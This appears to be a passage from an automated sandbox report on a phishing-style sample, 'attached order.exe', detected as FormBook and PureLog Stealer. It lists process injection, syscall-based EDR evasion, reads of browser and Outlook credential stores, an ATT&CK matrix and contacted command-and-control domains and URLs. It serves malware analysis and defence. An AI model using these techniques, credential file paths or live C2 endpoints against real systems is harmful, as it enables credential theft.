                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01738C79 mov eax, dword ptr fs:[00000030h]3_2_01738C79
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0172CC68 mov eax, dword ptr fs:[00000030h]3_2_0172CC68
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01764C3D mov eax, dword ptr fs:[00000030h]3_2_01764C3D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01728C3D mov eax, dword ptr fs:[00000030h]3_2_01728C3D
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_01804CD2 mov eax, dword ptr fs:[00000030h]3_2_01804CD2
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174AC20 mov eax, dword ptr fs:[00000030h]3_2_0174AC20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174AC20 mov eax, dword ptr fs:[00000030h]3_2_0174AC20
                      Source: C:\Users\user\Desktop\attached order.exeCode function: 3_2_0174AC20 mov eax, dword ptr fs:[00000030h]3_2_0174AC20
                      Source: C:\Users\user\Desktop\attached order.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Found direct / indirect Syscall (likely to bypass EDR)
                      Source: C:\Users\user\Desktop\attached order.exeNtSetContextThread: Indirect: 0x12836B9Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQuerySystemInformation: Direct from: 0x36094FAJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeNtSuspendThread: Indirect: 0x12839D9Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x360244AJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x360248EJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x360018BJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FF82C082651Jump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeNtResumeThread: Indirect: 0x1283CF9Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtQueryInformationToken: Direct from: 0x3601D4FJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFFFE699E7F
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x36096DF
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x56E2132Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x56DA4CBJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtAllocateVirtualMemory: Direct from: 0x360D286Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x360241BJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x36015E2Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x36095A9Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDeviceIoControlFile: Direct from: 0x3609651Jump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeNtClose: Indirect: 0x127F542
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x56DA53CJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeNtQueueApcThread: Indirect: 0x127F4BDJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x3602356Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x56DA305Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x360945EJump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x360AAD4Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtCreateThreadEx: Direct from: 0x36009E2Jump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\attached order.exeMemory written: C:\Users\user\Desktop\attached order.exe base: 400000 value starts with: 4D5AJump to behavior
                      Maps a DLL or memory area into another process
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeSection loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                      Modifies the context of a thread in another process (thread injection)
                      Source: C:\Users\user\Desktop\attached order.exeThread register set: target process: 7176Jump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 7176Jump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 7932Jump to behavior
                      Queues an APC in another process (thread injection)
                      Source: C:\Users\user\Desktop\attached order.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeProcess created: C:\Users\user\Desktop\attached order.exe "C:\Users\user\Desktop\attached order.exe"Jump to behavior
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: RAVCpl64.exe, 00000004.00000000.16812508193.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.17794369761.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: 6Program ManagerI
                      Source: RAVCpl64.exe, 00000004.00000000.16812508193.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.17794369761.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: RAVCpl64.exe, 00000004.00000000.16812508193.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.17794369761.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: RAVCpl64.exe, 00000004.00000000.16812508193.0000000000D61000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000002.17794369761.0000000000D61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\Desktop\attached order.exeQueries volume information: C:\Users\user\Desktop\attached order.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\attached order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.attached order.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.attached order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.16880552732.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.attached order.exe.9e20000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.4c15848.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.4bf5828.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.4bf5828.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.9e20000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.4c15848.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.16561859855.0000000009E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.16558585775.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.16558585775.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                      Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                      Remote Access Functionality

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.attached order.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.attached order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.16880552732.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 0.2.attached order.exe.9e20000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.4c15848.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.4bf5828.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.4bf5828.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.9e20000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.attached order.exe.4c15848.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.16561859855.0000000009E20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.16558585775.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.16558585775.0000000004C15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                      Services File Permissions Weakness                      		412
                      Process Injection                      		1
                      Masquerading                      		1
                      OS Credential Dumping                      		121
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job1
                      DLL Side-Loading                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Disable or Modify Tools                      		LSASS Memory2
                      Process Discovery                      		Remote Desktop Protocol11
                      Archive Collected Data                      		4
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Services File Permissions Weakness                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares1
                      Data from Local System                      		4
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      DLL Side-Loading                      		412
                      Process Injection                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture4
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                      Deobfuscate/Decode Files or Information                      		LSA Secrets2
                      File and Directory Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Abuse Elevation Control Mechanism                      		Cached Domain Credentials113
                      System Information Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Services File Permissions Weakness                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt22
                      Software Packing                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1563709 Sample: attached order.exe Startdate: 27/11/2024 Architecture: WINDOWS Score: 100 30 www.aktmarket.xyz 2->30 32 www.golivenow.live 2->32 34 12 other IPs or domains 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected PureLog Stealer 2->46 50 7 other signatures 2->50 10 attached order.exe 3 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 file5 28 C:\Users\user\...\attached order.exe.log, ASCII 10->28 dropped 62 Injects a PE file into a foreign processes 10->62 14 attached order.exe 10->14         started        17 attached order.exe 10->17         started        signatures6 process7 signatures8 64 Modifies the context of a thread in another process (thread injection) 14->64 66 Maps a DLL or memory area into another process 14->66 68 Queues an APC in another process (thread injection) 14->68 70 Found direct / indirect Syscall (likely to bypass EDR) 14->70 19 RAVCpl64.exe 14->19 injected process9 dnsIp10 36 www.christinascuties.net 74.208.236.156, 49745, 80 ONEANDONE-ASBrauerstrasse48DE United States 19->36 38 techmiseajour.net 84.32.84.32, 49746, 49747, 49748 NTT-LT-ASLT Lithuania 19->38 40 4 other IPs or domains 19->40 52 Found direct / indirect Syscall (likely to bypass EDR) 19->52 23 cacls.exe 13 19->23         started        signatures11 process12 signatures13 54 Tries to steal Mail credentials (via file / registry access) 23->54 56 Tries to harvest and steal browser information (history, passwords, etc) 23->56 58 Modifies the context of a thread in another process (thread injection) 23->58 60 2 other signatures 23->60 26 firefox.exe 23->26         started        process14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      attached order.exe34%ReversingLabs
                      attached order.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://www.iglpg.online/rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPxd74qpwzz3mNpUi2rk=&67ssp=tVX5mtZ66UVF0%Avira URL Cloudsafe
                      http://www.iglpg.online/rbqc/0%Avira URL Cloudsafe
                      http://www.golivenow.live/r2k9/0%Avira URL Cloudsafe
                      http://iglpg.online/rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQ0%Avira URL Cloudsafe
                      http://www.aktmarket.xyz/wb7v/?wIXhAG=IA0aHAKfw1DI7BcblrymbxKn4Du9G2zIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpGvOs3Qutuf7i9hpgx0=&67ssp=tVX5mtZ66UVF0%Avira URL Cloudsafe
                      http://www.golivenow.live/r2k9/?wIXhAG=R82aEe+RY/7ruopITyHmIZKE6mty2NjUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfWsMWJHlNdq0zf8f0Cc=&67ssp=tVX5mtZ66UVF0%Avira URL Cloudsafe
                      http://www.1qcczjvh2.autos0%Avira URL Cloudsafe
                      http://www.1qcczjvh2.autos/pfw9/0%Avira URL Cloudsafe
                      http://www.aktmarket.xyz/wb7v/0%Avira URL Cloudsafe
                      http://www.techmiseajour.net/jytl/0%Avira URL Cloudsafe
                      http://www.christinascuties.net/raea/?wIXhAG=PqKj/8KuIq0WSNkKBtYQxtP5ekYb45s1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVW+OdEFKSgTrNoF3hmw=&67ssp=tVX5mtZ66UVF0%Avira URL Cloudsafe
                      http://www.techmiseajour.net/jytl/?wIXhAG=g6hM5OfAy0aZTOdwtizvGwaLh1tc9b9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGmxIPeV05u7M1niwgNE=&67ssp=tVX5mtZ66UVF0%Avira URL Cloudsafe
                      http://www.1qcczjvh2.autos/pfw9/?wIXhAG=45l5W170mEENNSUnzK0Z1bPSyznn87pe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF3RmeGAfM1BGU/Lu+bk=&67ssp=tVX5mtZ66UVF0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.aktmarket.xyz
                      		13.248.169.48
                      		truetrue
                        		unknown
                        iglpg.online
                        		173.201.189.241
                        		truetrue
                          		unknown
                          1hong.pels5zqo.shop
                          		43.163.1.110
                          		truetrue
                            		unknown
                            www.christinascuties.net
                            		74.208.236.156
                            		truetrue
                              		unknown
                              techmiseajour.net
                              		84.32.84.32
                              		truetrue
                                		unknown
                                www.golivenow.live
                                		66.29.149.46
                                		truetrue
                                  		unknown
                                  www.gk88top.top
                                  		104.21.7.187
                                  		truetrue
                                    		unknown
                                    superiorfencing.net
                                    		103.230.159.86
                                    		truetrue
                                      		unknown
                                      www.techmiseajour.net
                                      		unknown
                                      		unknownfalse
                                        		unknown
                                        www.superiorfencing.net
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.iglpg.online
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.1qcczjvh2.autos
                                            		unknown
                                            		unknownfalse
                                              		unknown

                                              Contacted URLs

                                              NameMaliciousAntivirus DetectionReputation
                                              http://www.iglpg.online/rbqc/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.golivenow.live/r2k9/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.1qcczjvh2.autos/pfw9/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.aktmarket.xyz/wb7v/?wIXhAG=IA0aHAKfw1DI7BcblrymbxKn4Du9G2zIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpGvOs3Qutuf7i9hpgx0=&67ssp=tVX5mtZ66UVFtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.techmiseajour.net/jytl/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.aktmarket.xyz/wb7v/true
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.golivenow.live/r2k9/?wIXhAG=R82aEe+RY/7ruopITyHmIZKE6mty2NjUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfWsMWJHlNdq0zf8f0Cc=&67ssp=tVX5mtZ66UVFtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.iglpg.online/rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPxd74qpwzz3mNpUi2rk=&67ssp=tVX5mtZ66UVFtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.techmiseajour.net/jytl/?wIXhAG=g6hM5OfAy0aZTOdwtizvGwaLh1tc9b9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGmxIPeV05u7M1niwgNE=&67ssp=tVX5mtZ66UVFtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.christinascuties.net/raea/?wIXhAG=PqKj/8KuIq0WSNkKBtYQxtP5ekYb45s1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVW+OdEFKSgTrNoF3hmw=&67ssp=tVX5mtZ66UVFtrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.1qcczjvh2.autos/pfw9/?wIXhAG=45l5W170mEENNSUnzK0Z1bPSyznn87pe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF3RmeGAfM1BGU/Lu+bk=&67ssp=tVX5mtZ66UVFtrue
                                              • Avira URL Cloud: safe
                                              		unknown

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabcacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drfalse
                                                		high
                                                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchcacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drfalse
                                                  		high
                                                  http://vimeo.com/api/v2/video/attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=t577G2K6.5.drfalse
                                                      		high
                                                      http://tempuri.org/_prof_basesDataSet.xsdattached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, attached order.exe, 00000000.00000002.16557711789.00000000033DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icocacls.exe, 00000005.00000003.17065504826.0000000007B91000.00000004.00000020.00020000.00000000.sdmp, t577G2K6.5.drfalse
                                                          		high
                                                          http://vimeo.com/api/v2/album/attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=t577G2K6.5.drfalse
                                                              		high
                                                              http://www.1qcczjvh2.autosRAVCpl64.exe, 00000004.00000002.17797622157.0000000003629000.00000040.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://vimeo.com/api/v2/attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://vimeo.com/api/v2/activity/attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://vimeo.com/api/v2/channel/attached order.exe, 00000000.00000002.16557711789.00000000033D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.ecosia.org/newtab/cacls.exe, 00000005.00000003.17061545869.0000000007B22000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
